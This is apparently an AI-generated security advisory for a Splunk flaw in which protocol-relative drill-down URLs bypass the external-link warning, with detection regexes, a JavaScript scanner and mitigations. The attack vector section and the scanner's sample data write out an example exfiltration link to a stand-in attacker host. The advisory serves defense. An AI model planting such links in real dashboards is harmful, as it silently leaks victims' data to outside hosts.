
CVE-2026-20256: Splunk Information Disclosure Vulnerability

CVE-2026-20256 is an information disclosure flaw in Splunk Enterprise and Cloud Platform allowing low-privileged users to exfiltrate data via protocol-relative URLs. This article covers technical details, affected versions, and mitigation.

CVE-2026-20256 Overview

CVE-2026-20256 affects Splunk Enterprise and Splunk Cloud Platform. The vulnerability allows a low-privileged user to trigger data exfiltration through classic dashboards. An attacker redirects a victim to an external site using a protocol-relative URL in a drill-down link. The URL classifier in classic dashboards only inspects http:// and https:// schemes when identifying external URLs. Protocol-relative URLs such as //attacker.com bypass this check, and Splunk Web suppresses the external-navigation warning dialog. The flaw is tracked under [CWE-20] Improper Input Validation. Exploitation requires authentication with a non-admin, non-power role and victim interaction with the malicious dashboard link.

Critical Impact

Authenticated low-privileged users can exfiltrate sensitive dashboard data by silently redirecting victims to attacker-controlled domains through protocol-relative URLs in drill-down links.

Affected Products

  • Splunk Enterprise versions below 10.2.4, 10.0.7, 9.4.12, and 9.3.13
  • Splunk Cloud Platform versions below 10.3.2512.13, 10.2.2510.15, 10.1.2507.23, and 9.3.2411.132
  • Splunk classic dashboards using drill-down link functionality

Discovery Timeline

  • 2026-06-10 - CVE-2026-20256 published to NVD
  • 2026-06-10 - Last updated in the NVD database

Technical Details for CVE-2026-20256

Vulnerability Analysis

The vulnerability resides in the URL classifier used by Splunk classic dashboards. The classifier inspects drill-down link targets to determine whether the destination is external. When a destination is classified as external, Splunk Web presents a warning dialog before navigation. The classifier only matches the literal scheme prefixes http:// and https://. Protocol-relative URLs, which begin with //, are not recognized as external. Browsers resolve protocol-relative URLs using the current page scheme, so //attacker.com becomes https://attacker.com at navigation time. The dashboard treats the value as a relative path during classification while the browser treats it as a fully qualified external destination.

Root Cause

The classifier implements an incomplete scheme allowlist. It performs string matching against the two explicit prefixes instead of parsing the URL according to RFC 3986. Any value that does not match these two prefixes (including protocol-relative URLs, scheme-relative paths, and certain encoded variants) is treated as internal navigation.

Attack Vector

An authenticated user with a custom or low-privilege role creates or modifies a classic dashboard. The user inserts a drill-down link whose target is //attacker.com/collect?d=$row.field$ or similar. When a victim with access to the dashboard clicks the drill-down element, the browser issues a request to the attacker-controlled host. The request URL can carry exfiltrated data drawn from dashboard tokens, row context, or search results. The external-navigation warning dialog does not appear, so the victim has no visual cue that the destination is off-platform.

The vulnerability requires network access to Splunk Web, low-privileged authentication, and victim interaction. It does not require admin or power role membership, which expands the population of accounts capable of staging the attack.

Detection Methods for CVE-2026-20256

Indicators of Compromise

  • Dashboard XML or SimpleXML definitions containing drill-down link.target or <link> values that begin with //
  • Outbound HTTP/HTTPS requests from user browsers to unexpected external hosts immediately following Splunk dashboard interactions
  • Audit log entries showing dashboard edits by non-admin, non-power users that add or modify drill-down links
  • Referer headers in proxy logs pointing to Splunk Web URLs paired with destinations outside the organization

Detection Strategies

  • Scan saved dashboard objects for drill-down targets matching the regex ^//[^/] to identify protocol-relative URLs
  • Correlate splunkd_ui_access.log dashboard view events with egress proxy logs to surface anomalous user-driven redirects
  • Alert on creation or modification of classic dashboards by accounts that recently received dashboard-edit capabilities
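The root-cause section above describes a classifier that only string-matches http:// and https://, and the detection strategy above looks for targets matching ^//[^/]. The following is an added example, not Splunk's own code: it places that prefix-matching check beside an origin-based replacement that resolves the target the way the browser will, and runs both over constructed SimpleXML dashboard definitions to report links the naive check would silently let through. The origin https://splunk.example.com and the sample views are assumptions.

```javascript
// Added example (not Splunk's code): the prefix-matching classifier the advisory
// describes beside an origin-based replacement, plus a scan over dashboard XML.
// Assumption: Splunk Web is served from the constructed origin below.
const SPLUNK_ORIGIN = "https://splunk.example.com";

// Vulnerable pattern: only two literal scheme prefixes count as external,
// so "//attacker.example" is classified as an internal path.
function isExternalNaive(target) {
  return target.startsWith("http://") || target.startsWith("https://");
}

// Hardened check: resolve the target exactly as the browser will (WHATWG URL
// parsing against the page origin) and compare origins, not string prefixes.
function isExternalParsed(target, base = SPLUNK_ORIGIN) {
  let resolved;
  try {
    resolved = new URL(target, base);
  } catch {
    return true; // unparseable target: fail closed, treat as external
  }
  return resolved.origin !== new URL(base).origin;
}

// Pull <link> bodies out of SimpleXML drilldown definitions (regex is enough here;
// a production scanner should use a real XML parser).
function drilldownLinks(simpleXml) {
  const links = [];
  const re = /<link\b[^>]*>\s*([^<]*?)\s*<\/link>/g;
  let m;
  while ((m = re.exec(simpleXml)) !== null) links.push(m[1]);
  return links;
}

// Report links the naive classifier treats as internal but that actually
// leave the Splunk origin: the gap CVE-2026-20256 describes.
function findSilentExternalLinks(views) {
  const findings = [];
  for (const view of views) {
    for (const link of drilldownLinks(view.data)) {
      if (!isExternalNaive(link) && isExternalParsed(link)) {
        findings.push({ title: view.title, link });
      }
    }
  }
  return findings;
}

// Constructed sample views standing in for `| rest /servicesNS/-/-/data/ui/views` output.
const SAMPLE_VIEWS = [
  { title: "ok_internal", data: "<drilldown><link>/app/search/search?q=$row.host$</link></drilldown>" },
  { title: "ok_warned", data: "<drilldown><link target=\"_blank\">https://docs.example.org/$row.id$</link></drilldown>" },
  { title: "suspicious", data: "<drilldown><link>//attacker.example/collect?d=$row.field$</link></drilldown>" },
];
```

Running findSilentExternalLinks(SAMPLE_VIEWS) returns only the "suspicious" view; the https:// link is flagged by both checks (and so gets the warning dialog), and the relative path stays on the Splunk origin.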

Monitoring Recommendations

  • Log and review all savedsearches.conf and dashboard XML changes through configuration management
  • Forward Splunk Web access logs and browser proxy telemetry to a centralized analytics platform for correlation
  • Track dashboard authoring activity by role, with elevated scrutiny for non-admin, non-power users

How to Mitigate CVE-2026-20256

Immediate Actions Required

  • Upgrade Splunk Enterprise to 10.2.4, 10.0.7, 9.4.12, 9.3.13, or later within the supported branch
  • Confirm Splunk Cloud Platform instances are running 10.3.2512.13, 10.2.2510.15, 10.1.2507.23, 9.3.2411.132, or later
  • Audit existing classic dashboards for drill-down links containing protocol-relative URLs and remove or remediate them
  • Restrict dashboard authoring capabilities to roles that require them, applying least privilege to custom roles

Patch Information

Splunk addressed the issue in the fixed versions listed above. Refer to the Splunk Security Advisory SVD-2026-0606 for vendor guidance, fixed builds, and any additional configuration notes.

Workarounds

  • Migrate classic dashboards to Dashboard Studio where feasible, which uses a different link-handling pipeline
  • Remove the edit_dashboards and related capabilities from low-privileged custom roles until upgrades are deployed
  • Implement egress filtering or browser policy controls that block user navigation from Splunk Web to unapproved external domains
Splunk search (SPL) to list saved dashboards whose drill-down links begin with // (the regex avoids matching the // inside ordinary http:// and https:// links):

```spl
| rest /servicesNS/-/-/data/ui/views
| regex eai:data="<link[^>]*>\s*//[^/]"
| table title author eai:acl.app updated
```

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
